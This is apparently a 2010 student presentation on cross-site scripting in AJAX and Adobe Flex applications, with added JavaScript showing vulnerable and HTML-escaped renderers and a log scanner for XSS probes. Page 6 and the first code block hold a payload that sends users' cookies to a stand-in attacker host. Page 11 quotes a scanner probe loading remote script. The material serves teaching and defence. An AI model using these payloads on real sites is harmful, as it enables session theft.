Cross-Site Scripting (XSS) Vulnerability in AJAX and Adobe Flex Applications

Danielle Cauthen, 04/09/2010, COMS E6125 – Web enHanced Information Management


Page 1: Cross-Site Scripting (XSS) Vulnerability in AJAX and Adobe Flex Applications

Cross-Site Scripting (XSS) Vulnerability in AJAX and Adobe Flex Applications

Danielle Cauthen
04/09/2010
COMS E6125 – Web enHanced Information Management

Page 2

What is Cross-Site Scripting?

Cross-Site Scripting, or XSS (not to be confused with CSS, Cascading Style Sheets), allows attackers to inject client-side script into a web page.

The attacker injects script, such as JavaScript, VBScript, ActiveX, HTML, or Flash, into an application to try to gain access to sensitive information.

Dynamic websites (using AJAX or Flex, for example) are vulnerable. Static websites are not at risk.

Page 3

Diagram of XSS Attack

[Diagram: XSS attack, from CGISecurity.com]

Page 4

XSS Compared to Other Vulnerabilities

XSS is the #1 website security issue, with a 66% likelihood that a website has the vulnerability.

Statistics from WhiteHat Website Security Report, Fall 2009 edition.

Page 5

XSS Types

Two types of XSS attacks:

◦ Non-altering (or non-persistent): causes no change to the page functionality.

◦ Altering (or persistent): a script injection that can be placed permanently in the database, causing a change to the page functionality that persists each time the page is requested.

Page 6

Non-Altering (Non-Persistent)

An attacker can take a URL that contains personal data, e.g. www.website.com/username=danielle, and modify the username field by entering JavaScript to steal the cookie, altering the URL to www.website.com/username=<script>document.location='http://attacker.com/cookiesteal.cgi?'+document.cookie</script>

To diminish suspicion, the attacker can URL-encode the JavaScript so it is not apparent.

Page 7

Altering (Persistent)

Within a forum, users' posts may be stored in a database, usually being tracked by a session ID cookie.

An attacker can post a message containing malicious script that, if a user reads it, may compromise their account.
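The reflected case from Page 6 and the stored forum case from Page 7 rendered server-side, each in a vulnerable form and a hardened form. This is an added example, not code from the slides or from any site named on them; it assumes a conventional query string "?username=..." (the slide writes the URL without the "?") and a Node.js-style renderer that builds HTML as a string.

```javascript
// Added example (not the slides' code): a minimal Node.js-style server-side renderer
// showing the reflected case (Page 6) and the stored forum case (Page 7), each in a
// vulnerable form and a hardened form that HTML-escapes untrusted text before it is
// placed in the page. Assumes a conventional query string "?username=...".

// Escape the five characters that let text break out of an HTML text node or attribute.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// Reflected XSS (Page 6): the username comes straight from the request URL. The URL
// parser decodes the query, so a URL-encoded payload reaches the server exactly as the
// plain one would (in a raw query "+" is read as a space, so the encoded form round-trips).
function usernameFrom(urlString) {
  return new URL(urlString).searchParams.get('username') || '';
}
function renderProfileVulnerable(urlString) {
  return '<h1>Welcome, ' + usernameFrom(urlString) + '</h1>';            // raw concatenation
}
function renderProfileSafe(urlString) {
  return '<h1>Welcome, ' + escapeHtml(usernameFrom(urlString)) + '</h1>';
}

// Stored XSS (Page 7): posts were saved verbatim and are rendered for every reader.
function renderForumVulnerable(posts) {
  return posts.map(p => `<li>${p.author}: ${p.body}</li>`).join('\n');
}
function renderForumSafe(posts) {
  return posts.map(p => `<li>${escapeHtml(p.author)}: ${escapeHtml(p.body)}</li>`).join('\n');
}

// Does the rendered HTML still contain a live script tag?
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Constructed sample inputs: the slide's cookie-stealing payload, plain and URL-encoded,
// the slide's benign URL, and a forum thread with one constructed malicious post.
const PAYLOAD = "<script>document.location='http://attacker.com/cookiesteal.cgi?'+document.cookie</script>";
const BENIGN_URL = 'http://www.website.com/?username=danielle';
const PLAIN_URL = 'http://www.website.com/?username=' + PAYLOAD;
const ENCODED_URL = 'http://www.website.com/?username=' + encodeURIComponent(PAYLOAD);
const POSTS = [
  { author: 'danielle', body: 'Hello, forum!' },
  { author: 'mallory', body: PAYLOAD },   // constructed malicious post
];
```

The safe variants do not try to detect script; they encode every untrusted value on output, which is what makes both the plain and the URL-encoded payload inert.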

Page 8

Threat to AJAX

Because of the JavaScript and client-side scripting of AJAX, its largest security risk is XSS.

From AJAX: The Definitive Guide:

◦ “Before Ajax, any attack made with an XSS vulnerability was done while the user's browser was in a wait state, and it usually coincided with some kind of visual indication by the browser that would give the user reason to think something untoward was happening.

◦ Once Ajax was introduced, this visual cue would disappear, and the user would have no way of knowing whether malicious code was being executed from the browser.”

Page 9

Threat to Adobe Flex

Though not as common as with AJAX, Flex has also been prone to cross-site scripting, especially if HTML and other scripting features are used in a Flex application.

However, Adobe, realizing the threat, has strict security in place to prevent XSS:

◦ By default, you cannot call script on an HTML page if the HTML page is not in the same domain as the Flex application.

◦ Since a Flex application is compiled into a SWF file, it cannot itself be vulnerable to XSS.

◦ The sandbox security model prevents private information from being sent elsewhere.

Page 10

Testing for XSS Vulnerabilities

Acunetix Web Vulnerability Scanner – a tool that scans web applications for XSS vulnerabilities (more useful with AJAX applications).

HP SWFScan – a tool that is helpful in finding security vulnerabilities in Flex/Flash applications. It decompiles and extracts the code from the .swf file, and then analyzes it for vulnerabilities.

Page 11

Testing AJAX Application

Using Acunetix, Kayak.com (the AJAX web application for travel comparison) was found to have 146 vulnerabilities.

Example: when a user clicks on a menu item, such as Flights, that information is submitted in a GET request as a variable named tab. Acunetix was able to manipulate this variable numerous times, on one occasion setting tab to <ScRiPt+bad=">"+src="http://testphp.acutenix.com/xss.js?40392"></ScRiPt>
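A defender looking for probes like the one above in server logs has to decode the parameter first: the scanner's payload uses mixed case and "+" for spaces, and Page 6 notes that attackers also URL-encode script. The following is an added example, not code from the slides or from Acunetix; it assumes Apache-style combined log lines and uses constructed sample lines containing the slide's payload.

```javascript
// Added example (not the slides' code): triage of constructed access-log lines for
// XSS probes aimed at a query parameter such as Kayak's "tab". Assumes Apache-style
// combined log lines. URLSearchParams turns "+" into a space and percent-decodes, so
// the slide's mixed-case, "+"-separated probe and a fully URL-encoded copy of it
// (the encoding trick from Page 6) normalise to the same string before matching.

// Constructed sample lines: a normal click, the slide's probe as sent, the same probe
// percent-encoded, and a request with no query string.
const SAMPLE_LOG = [
  '203.0.113.7 - - [09/Apr/2010:10:15:01 -0400] "GET /?tab=flights HTTP/1.1" 200 5120',
  '203.0.113.7 - - [09/Apr/2010:10:15:09 -0400] "GET /?tab=<ScRiPt+bad=">"+src="http://testphp.acutenix.com/xss.js?40392"></ScRiPt> HTTP/1.1" 200 5120',
  '203.0.113.7 - - [09/Apr/2010:10:15:12 -0400] "GET /?tab=%3CScRiPt%20bad%3D%22%3E%22%20src%3D%22http%3A%2F%2Ftestphp.acutenix.com%2Fxss.js%3F40392%22%3E%3C%2FScRiPt%3E HTTP/1.1" 200 5120',
  '203.0.113.7 - - [09/Apr/2010:10:15:13 -0400] "GET /js/app.js HTTP/1.1" 200 880',
];

const LINE_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) HTTP\/[\d.]+"/;

// Indicators of script injection in a decoded value. This is a log-review heuristic
// for finding probes; the fix for the application itself is output encoding.
const INDICATORS = [
  { reason: 'script tag', re: /<\s*\/?\s*script\b/i },
  { reason: 'javascript: URL', re: /javascript\s*:/i },
  { reason: 'event handler attribute', re: /\bon[a-z]+\s*=/i },
];

// Parse one line; return { ip, time, decoded } for `param`, or null if absent.
function paramFromLine(line, param) {
  const m = LINE_RE.exec(line);
  if (!m) return null;
  const [, ip, time, target] = m;
  const q = target.indexOf('?');
  if (q < 0) return null;
  const value = new URLSearchParams(target.slice(q + 1)).get(param);
  return value === null ? null : { ip, time, decoded: value };
}

// Scan all lines; return the entries whose decoded `param` value matches an indicator.
function scanLog(lines, param = 'tab') {
  const hits = [];
  for (const line of lines) {
    const entry = paramFromLine(line, param);
    if (!entry) continue;
    const hit = INDICATORS.find(i => i.re.test(entry.decoded));
    if (hit) hits.push({ ...entry, param, reason: hit.reason });
  }
  return hits;
}
```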

Page 12

Testing AJAX

Page 13

Flex

Using HP SWFScan, the Flex application Sherwin Williams Color Visualizer (www.sherwin-williams.com/visualizer) was tested.

No XSS vulnerabilities were found.

Page 14

Testing Flex

Page 15

Conclusion

XSS can be both damaging and costly while compromising user security.

XSS is a bigger risk to AJAX, due to the JavaScript and client-side scripting.

Flex is vulnerable but a lot more resistant due to Adobe security features.

Developers of both AJAX and Flex applications should check and validate any input to ensure it doesn't include script.

Page 16

References

Acunetix (2010). Web Vulnerability Scanner [Version 6.5]. Retrieved from http://www.acunetix.com/vulnerability-scanner/download.htm

Adobe Systems Incorporated (2004). Cross Site Scripting in Flash. Retrieved from http://kb2.adobe.com/cps/196/tn_19604.html

Adobe Systems Incorporated (2008). Adobe Flex Developer's Guide. Retrieved from http://livedocs.adobe.com/flex/3/devguide_flex3.pdf

Cgisecurity.com (2002, May). The Cross Site Scripting (XSS) FAQ. Retrieved from http://www.cgisecurity.com/xss-faq.html

Hewlett-Packard Development Company, L.P. (2009). SWFScan. Retrieved from http://www.brothersoft.com/hp-swfscan-253747.html

Holdener III, Anthony T. (2008). Ajax: The Definitive Guide. Sebastopol, CA: O’Reilly Media.

WhiteHat Security (2009). WhiteHat Website Security Statistics Report. Retrieved from http://www.whitehatsec.com/home/assets/WPstats_fall09_8th.pdf